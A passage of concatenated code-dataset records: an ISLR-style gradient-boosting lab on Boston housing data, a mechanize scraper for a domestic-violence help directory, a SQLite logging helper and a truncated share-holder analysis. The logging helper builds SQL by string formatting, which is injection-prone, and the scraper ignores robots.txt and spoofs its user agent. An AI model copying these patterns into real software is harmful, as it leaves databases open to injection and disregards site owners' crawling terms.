-------------------------------------------\n\n# Split data into training and test sets\nX = boston.drop(columns=['medv'])\ny = boston[['medv']]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=3)\n\n# Boosting regression\nregr_boo = ens.GradientBoostingRegressor(max_features='auto', n_estimators=5000, max_depth=4, learning_rate=0.01).fit(X_train, y_train)\n\n# Predict\ny_pred = regr_boo.predict(X_test)\n\n# MSE\nprint('The MSE for the boosted tree is: {}'.format(mean_squared_error(y_test, y_pred)))\nprint('The RMSE for the boosted tree is: {}'.format(np.sqrt(mean_squared_error(y_test, y_pred))))\n\"\"\"\nUsing a boosted tree on the data yields results of the same magnitude as bagging and random forest\n\"\"\"\n\n# Try boosting with different depths\nMSEs = []\nfor i in np.arange(2, 201):\n    # Models\n    regr_boo1 = ens.GradientBoostingRegressor(max_features='auto', n_estimators=i, max_depth=4, learning_rate=0.08).fit(X_train, y_train)\n    regr_boo2 = ens.GradientBoostingRegressor(max_features='auto', n_estimators=i, max_depth=6, learning_rate=0.08).fit(X_train, y_train)\n    regr_boo3 = ens.GradientBoostingRegressor(max_features='sqrt', n_estimators=i, max_depth=6, learning_rate=0.08).fit(X_train, y_train)\n    regr_boo4 = ens.GradientBoostingRegressor(max_features='log2', n_estimators=i, max_depth=6, learning_rate=0.08).fit(X_train, y_train)\n\n    # Predictions\n    mse1 = mean_squared_error(y_test, regr_boo1.predict(X_test))\n    mse2 = mean_squared_error(y_test, regr_boo2.predict(X_test))\n    mse3 = mean_squared_error(y_test, regr_boo3.predict(X_test))\n    mse4 = mean_squared_error(y_test, regr_boo4.predict(X_test))\n\n    # Results\n    MSEs += [[i, mse1, mse2, mse3, mse4]]\n\nres_df = pd.DataFrame(MSEs, columns=['no_trees', 'mse1', 'mse2', 'mse3', 'mse4'])\nres_df\n\n# Plot results\nplt.figure(figsize=(10, 7))\nsns.lineplot(x='no_trees', y='mse1', data=res_df, label='boosting depth=4')\nsns.lineplot(x='no_trees', y='mse2', data=res_df, label='boosting depth=6')\nsns.lineplot(x='no_trees', y='mse3', data=res_df, label=\"boosting depth=6, features='sqrt'\")\nsns.lineplot(x='no_trees', y='mse4', data=res_df, label=\"boosting depth=6, features='log2'\")\nplt.xlabel('number of trees')\nplt.ylabel('MSE')\n\n# Let's try all again but for just 1 iteration with 5000 trees\nregr_boo1 = ens.GradientBoostingRegressor(max_features='auto', n_estimators=5000, max_depth=4, learning_rate=0.05).fit(X_train, y_train)\nregr_boo2 = ens.GradientBoostingRegressor(max_features='auto', n_estimators=5000, max_depth=6, learning_rate=0.05).fit(X_train, y_train)\nregr_boo3 = ens.GradientBoostingRegressor(max_features='sqrt', n_estimators=5000, max_depth=6, learning_rate=0.05).fit(X_train, y_train)\nregr_boo4 = ens.GradientBoostingRegressor(max_features='log2', n_estimators=5000, max_depth=6, learning_rate=0.05).fit(X_train, y_train)\n\nprint('The RMSE for auto, depth=4 is: {}'.format(np.sqrt(mean_squared_error(y_test, regr_boo1.predict(X_test)))))\nprint('The RMSE for auto, depth=6 is: {}'.format(np.sqrt(mean_squared_error(y_test, regr_boo2.predict(X_test)))))\nprint('The RMSE for sqrt, depth=6 is: {}'.format(np.sqrt(mean_squared_error(y_test, regr_boo3.predict(X_test)))))\nprint('The RMSE for log2, depth=6 is: {}'.format(np.sqrt(mean_squared_error(y_test, regr_boo4.predict(X_test)))))\n\n", "sub_path": "ch8-tree-based-methods/ch8-lab-decision-trees.py", "file_name": "ch8-lab-decision-trees.py", "file_ext": "py", "file_size_in_byte": 20366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.getcwd", "line_number": 44, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 46, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 101, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.figure", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "seaborn.pairplot", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "seaborn.pairplot", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 127, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 137, "usage_type": "call"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 143, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 143, "usage_type": "name"}, {"api_name": "graphviz.Source", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 163, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 177, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 177, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 210, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 218, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 224, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 226, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 234, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 263, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 266, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 266, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 272, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 273, 
"usage_type": "call"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 276, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 276, "usage_type": "name"}, {"api_name": "graphviz.Source", "line_number": 279, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 289, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 302, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 302, "usage_type": "argument"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 305, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 305, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 310, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 335, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 337, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 341, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
346, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 347, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 350, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 351, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 352, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 352, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 353, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 354, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 354, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 355, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 355, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 361, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 363, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 381, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 381, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 396, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 399, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 399, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 405, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 405, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 411, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 411, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 417, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 425, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 427, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 427, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 428, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 428, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 429, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 429, "usage_type": 
"name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 442, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 443, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 444, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 457, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 457, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 458, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 459, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 460, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 462, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 462, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 464, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 464, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 465, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 466, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 467, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 468, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 468, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 478, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 478, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 479, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 479, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 480, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 480, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 482, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 482, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 483, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 483, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 484, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 484, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 488, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 490, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 490, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 491, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 491, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 494, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 494, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 495, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
495, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 497, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 497, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 498, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 501, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 501, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 552, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 555, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 555, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 562, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 562, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 569, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 571, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 571, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 572, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 572, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 573, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 573, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 574, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 574, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 577, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 578, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 579, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 580, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 585, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 589, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 589, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 590, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 591, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 592, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 593, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 594, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 594, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 595, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 598, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 598, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 599, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 599, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 600, "usage_type": "call"}, {"api_name": "sklearn.ensemble", 
"line_number": 600, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 601, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 601, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 603, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 604, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 604, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 605, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 605, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 606, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 606, "usage_type": "call"}]} +{"seq_id": "113071957", "text": "from mechanize import Browser\ndef ma_dv_hotline(cityName):\n br = Browser() \n br.set_handle_robots(False) # ignore robots\n br.set_handle_refresh(False) # can sometimes hang without this\n br.addheaders = [('User-agent', 'Firefox')] \t \n br.open(\"https://findhelp.janedoe.org/find_help/search\") \n br.select_form(id=\"searchprograms\") \n br[\"city\"] = [cityName] \n response = br.submit() \n cleanResponse = response.read().decode(\"utf-8\") #get rid of bytes-type error and white space\n cleanResponse = cleanResponse.replace('','')\n return cleanResponse\n\n#parse the output with HTMLParser\nfrom html.parser import HTMLParser\nclass HTMLFilter(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.recording = 0\n self.text = \"\"\n self.data = []\n\n def handle_starttag(self, tag, attributes):\n if tag != 'div':\n return\n if self.recording:\n self.recording += 1\n return\n for name, value in attributes:\n if name == 'class' and value == 'article':\n break\n else:\n return\n self.recording = 1\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.recording:\n self.recording -= 1\n\n def handle_data(self, data): \n if self.recording: \n self.text += data ", "sub_path": "docassemble/DVhotline/dv_hotline.py", "file_name": "dv_hotline.py", "file_ext": "py", "file_size_in_byte": 1278, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "mechanize.Browser", "line_number": 3, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 17, "usage_type": "name"}, {"api_name": "html.parser.HTMLParser.__init__", "line_number": 19, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "578880752", "text": "import glob\nimport os\nimport sqlite3\nimport datetime\n\n\ndb_loc = '/data6/bio/TFM/asshole/db.sqlite3'\n\ndef save_to_db(task_id, rule_name, in_list, out_list, status ):\n \n save_str_wc = \"INSERT INTO explorer_snakeruleresult VALUES (null, '{date_time}', '{task_id}', '{rule_name}', '{in_list}','{out_list}', '{status}');\"\n save_str = save_str_wc.format(date_time=datetime.datetime.now(),\ntask_id=task_id, rule_name=rule_name, in_list=in_list, out_list=out_list, status=status)\n \n print(save_str)\n \n conn = sqlite3.connect(db_loc)\n c = conn.cursor()\n c.execute(save_str)\n conn.commit()\n conn.close()", "sub_path": "bin/templates/head.py", "file_name": "head.py", "file_ext": "py", "file_size_in_byte": 626, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": 
[{"api_name": "datetime.datetime.now", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "546632847", "text": "from __future__ import division\n\nimport os\nimport sys\nfrom datetime import datetime\n\nimport mongoengine\nsys.path.append(os.path.abspath(os.path.join('..', '..', '..')))\nfrom iquant.mongodb.models import ShareHolders\nfrom iquant.mongodb.models import ShareHoldersBrief\n\n\n\n\ndef get_data():\n data = {}\n for sample in ShareHolders.objects().order_by('-datetime'):\n if not data.has_key(sample.code):\n data[sample.code] = []\n data[sample.code].append({'datetime': sample.datetime,\n 'holder_num': sample.holder_num,\n 'holder_avgnum_tradable': sample.holder_avgnum_tradable})\n return data\n\n\ndef share_holder_calculate(data, period, updatetime):\n print(\"Calculating for period \" + str(period))\n for code, share_holder_data in data.iteritems():\n if len(share_holder_data) >= (period + 4):\n is_valid = True\n for i in range(0, 4):\n if share_holder_data[period + i]['holder_num'] < 1000 or \\\n share_holder_data[period + i]['holder_avgnum_tradable'] < 1000:\n is_valid = False\n break\n if is_valid:\n segment_data = share_holder_data[0: period]\n max_holder_num_index = get_max_holder_num_index(segment_data)\n if max_holder_num_index != -1:\n max_holder_num = segment_data[max_holder_num_index]['holder_num']\n latest_holder_num = segment_data[0]['holder_num']\n ratio = float((max_holder_num - latest_holder_num) / max_holder_num)\n store_to_db(updatetime,\n code,\n get_name_by_code(code),\n period,\n ratio,\n segment_data[max_holder_num_index]['datetime'])\n\n\ndef get_max_holder_num_index(share_holder_data):\n max_holder_num = 0\n index = 0\n for sample in share_holder_data:\n if sample['holder_num'] < 1000 or sample['holder_avgnum_tradable'] < 1000:\n return -1\n if sample['holder_num'] > max_holder_num:\n max_holder_num = sample['holder_num']\n max_holder_num_index = index\n index += 1\n return max_holder_num_index\n\n\ndef 